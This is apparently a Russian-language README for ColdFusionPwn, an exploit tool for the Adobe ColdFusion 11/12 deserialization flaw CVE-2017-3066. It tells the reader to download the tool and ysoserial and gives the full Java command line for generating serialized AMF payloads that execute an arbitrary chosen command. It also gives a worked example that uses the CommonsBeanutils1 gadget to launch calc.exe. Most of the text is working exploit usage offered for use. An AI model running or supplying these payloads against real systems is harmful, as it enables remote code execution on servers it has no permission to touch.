
Инструмент для эксплуатации CVE-2017-3066, нацеленный на Adobe Coldfusion 11/12
Инструмент эксплуатации CVE-2017-3066, нацеленный на Adobe Coldfusion 11/12.
Инструмент позволяет генерировать сериализованные AMF-пейлоады для эксплуатации отсутствующей проверки ввода допустимых классов. Подробности см. в нашей записи в блоге.
Загрузите последнюю версию ysoserial. Загрузите ColdFusionPwn из релизов.
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type] ysoserial gadget payload
- [command] command to be executed
- [outfile] output file for the generated payload
Необходимо, чтобы ColdFusionPwn-0.0.1-SNAPSHOT-all.jar был первым в classpath, поскольку библиотека ApacheCommons BeanUtils, поставляемая с ysoserial, новее (и имеет другое значение serialVersionUID).
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf